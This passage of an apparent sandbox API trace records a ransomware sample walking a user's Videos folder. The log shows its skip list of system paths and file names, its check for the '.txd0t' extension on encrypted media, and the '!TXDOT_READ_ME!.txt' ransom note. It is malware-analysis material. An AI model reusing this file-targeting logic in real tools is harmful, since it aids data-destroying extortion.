ftLastAccessTime.dwLowDateTime=0x5300ee3c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Z2p1JCW7G9Pu", cAlternateFileName="Z2P1JC~1")) returned 1 [0119.932] StrCmpW (psz1="Z2p1JCW7G9Pu", psz2=".") returned 1 [0119.932] StrCmpW (psz1="Z2p1JCW7G9Pu", psz2="..") returned 1 [0119.932] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.932] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.932] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="Z2p1JCW7G9Pu", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0119.932] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\system32\\") returned 0x0 [0119.932] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.932] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\system\\") returned 0x0 [0119.932] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.932] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.932] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\appdata\\local\\") returned 0x0 [0119.932] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.932] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.932] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.932] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\boot\\") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\perflogs\\") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\programdata\\") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\drivers\\") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\wsus\\") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="crypt_detect") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="cryptolocker") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="ransomware") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="C:\\WINDOWS") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.933] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="C:\\Program Files") returned 0x0 [0119.933] GetProcessHeap () returned 0xe30000 [0119.933] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ee) returned 0x680dae8 [0119.933] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0119.933] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\*", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*" [0119.933] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*", lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc450e690, ftCreationTime.dwHighDateTime=0x1d5eb8d, ftLastAccessTime.dwLowDateTime=0x5300ee3c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.933] StrCmpW (psz1=".", psz2=".") returned 0 [0119.933] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc450e690, ftCreationTime.dwHighDateTime=0x1d5eb8d, ftLastAccessTime.dwLowDateTime=0x5300ee3c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.933] StrCmpW (psz1="..", psz2=".") returned 1 [0119.933] StrCmpW (psz1="..", psz2="..") returned 0 [0119.933] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52fe8c69, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52fe8c69, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.933] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.933] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.933] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0119.933] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0119.933] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\!TXDOT_READ_ME!.txt" [0119.933] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.933] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.934] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.934] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe193def0, ftCreationTime.dwHighDateTime=0x1d5e3c3, ftLastAccessTime.dwLowDateTime=0xa2d2a3d0, ftLastAccessTime.dwHighDateTime=0x1d5f049, ftLastWriteTime.dwLowDateTime=0x52fe8c69, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1216d, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="AuNane-wUgoPDM.swf.txd0t", cAlternateFileName="AUNANE~1.TXD")) returned 1 [0119.934] StrCmpW (psz1="AuNane-wUgoPDM.swf.txd0t", psz2=".") returned 1 [0119.934] StrCmpW (psz1="AuNane-wUgoPDM.swf.txd0t", psz2="..") returned 1 [0119.934] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0119.934] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0119.934] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="AuNane-wUgoPDM.swf.txd0t", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf.txd0t" [0119.934] PathFindExtensionW (pszPath="AuNane-wUgoPDM.swf.txd0t") returned=".txd0t" [0119.934] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.934] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaaf48690, ftCreationTime.dwHighDateTime=0x1d5f08b, ftLastAccessTime.dwLowDateTime=0xdd8dc560, ftLastAccessTime.dwHighDateTime=0x1d5f00b, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xae32, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="w7jO4I_4r ubq7OFIn.flv.txd0t", cAlternateFileName="W7JO4I~1.TXD")) returned 1 [0119.934] StrCmpW (psz1="w7jO4I_4r ubq7OFIn.flv.txd0t", psz2=".") returned 1 [0119.934] StrCmpW (psz1="w7jO4I_4r ubq7OFIn.flv.txd0t", psz2="..") returned 1 [0119.934] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0119.934] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0119.934] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="w7jO4I_4r ubq7OFIn.flv.txd0t", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv.txd0t" [0119.934] PathFindExtensionW (pszPath="w7jO4I_4r ubq7OFIn.flv.txd0t") returned=".txd0t" [0119.934] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.934] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaaf48690, ftCreationTime.dwHighDateTime=0x1d5f08b, ftLastAccessTime.dwLowDateTime=0xdd8dc560, ftLastAccessTime.dwHighDateTime=0x1d5f00b, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xae32, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="w7jO4I_4r ubq7OFIn.flv.txd0t", cAlternateFileName="W7JO4I~1.TXD")) returned 0 [0119.934] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.934] GetProcessHeap () returned 0xe30000 [0119.935] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x680dae8 | out: hHeap=0xe30000) returned 1 [0119.935] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b79baf0, ftCreationTime.dwHighDateTime=0x1d5eca1, ftLastAccessTime.dwLowDateTime=0x5d533ed0, ftLastAccessTime.dwHighDateTime=0x1d5ed9e, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8838, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ZXAEqbOqqWast AZ98L.flv.txd0t", cAlternateFileName="ZXAEQB~1.TXD")) returned 1 [0119.935] StrCmpW (psz1="ZXAEqbOqqWast AZ98L.flv.txd0t", psz2=".") returned 1 [0119.935] StrCmpW (psz1="ZXAEqbOqqWast AZ98L.flv.txd0t", psz2="..") returned 1 [0119.935] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.935] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.935] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="ZXAEqbOqqWast AZ98L.flv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv.txd0t" [0119.935] PathFindExtensionW (pszPath="ZXAEqbOqqWast AZ98L.flv.txd0t") returned=".txd0t" [0119.935] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.935] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b79baf0, ftCreationTime.dwHighDateTime=0x1d5eca1, ftLastAccessTime.dwLowDateTime=0x5d533ed0, ftLastAccessTime.dwHighDateTime=0x1d5ed9e, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8838, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ZXAEqbOqqWast AZ98L.flv.txd0t", cAlternateFileName="ZXAEQB~1.TXD")) returned 0 [0119.935] FindClose (in: hFindFile=0xec1eb0 | out: hFindFile=0xec1eb0) returned 1 [0119.935] GetProcessHeap () returned 0xe30000 [0119.935] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0119.935] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda7902c0, ftCreationTime.dwHighDateTime=0x1d5eff4, ftLastAccessTime.dwLowDateTime=0x7abe1d0, ftLastAccessTime.dwHighDateTime=0x1d5e88f, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xdf4b, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ay37U hT.mp4.txd0t", cAlternateFileName="AY37UH~1.TXD")) returned 1 [0119.935] StrCmpW (psz1="ay37U hT.mp4.txd0t", psz2=".") returned 1 [0119.935] StrCmpW (psz1="ay37U hT.mp4.txd0t", psz2="..") returned 1 [0119.935] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.935] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0119.935] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="ay37U hT.mp4.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4.txd0t" [0119.935] PathFindExtensionW (pszPath="ay37U hT.mp4.txd0t") returned=".txd0t" [0119.935] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.935] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61371310, ftCreationTime.dwHighDateTime=0x1d5eb09, ftLastAccessTime.dwLowDateTime=0x7f6f64c0, ftLastAccessTime.dwHighDateTime=0x1d5e81d, ftLastWriteTime.dwLowDateTime=0x5305bd01, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13663, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="kxtmh_DCIU7SgwmG7I.swf.txd0t", cAlternateFileName="KXTMH_~1.TXD")) returned 1 [0119.935] StrCmpW (psz1="kxtmh_DCIU7SgwmG7I.swf.txd0t", psz2=".") returned 1 [0119.935] StrCmpW (psz1="kxtmh_DCIU7SgwmG7I.swf.txd0t", psz2="..") returned 1 [0119.935] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.935] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0119.935] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="kxtmh_DCIU7SgwmG7I.swf.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf.txd0t" [0119.935] PathFindExtensionW (pszPath="kxtmh_DCIU7SgwmG7I.swf.txd0t") returned=".txd0t" [0119.935] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.935] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa587ac60, ftCreationTime.dwHighDateTime=0x1d5e0cc, ftLastAccessTime.dwLowDateTime=0xc8cf62e0, ftLastAccessTime.dwHighDateTime=0x1d5e3c3, ftLastWriteTime.dwLowDateTime=0x530815e9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8863, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OoNzmd4unsBSLKUjo7.avi.txd0t", cAlternateFileName="OONZMD~1.TXD")) returned 1 [0119.935] StrCmpW (psz1="OoNzmd4unsBSLKUjo7.avi.txd0t", psz2=".") returned 1 [0119.935] StrCmpW (psz1="OoNzmd4unsBSLKUjo7.avi.txd0t", psz2="..") returned 1 [0119.936] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.936] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0119.936] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="OoNzmd4unsBSLKUjo7.avi.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi.txd0t" [0119.936] PathFindExtensionW (pszPath="OoNzmd4unsBSLKUjo7.avi.txd0t") returned=".txd0t" [0119.936] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.936] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94e1c850, ftCreationTime.dwHighDateTime=0x1d5ec3e, ftLastAccessTime.dwLowDateTime=0x90cdc3c0, ftLastAccessTime.dwHighDateTime=0x1d5e1d7, ftLastWriteTime.dwLowDateTime=0x530815e9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf82b, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="t8NhEX.mkv.txd0t", cAlternateFileName="T8NHEX~1.TXD")) returned 1 [0119.936] StrCmpW (psz1="t8NhEX.mkv.txd0t", psz2=".") returned 1 [0119.936] StrCmpW (psz1="t8NhEX.mkv.txd0t", psz2="..") returned 1 [0119.936] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.936] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0119.936] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="t8NhEX.mkv.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv.txd0t" [0119.936] PathFindExtensionW (pszPath="t8NhEX.mkv.txd0t") returned=".txd0t" [0119.939] StrCmpW (psz1=".txd0t", psz2=".txd0t") 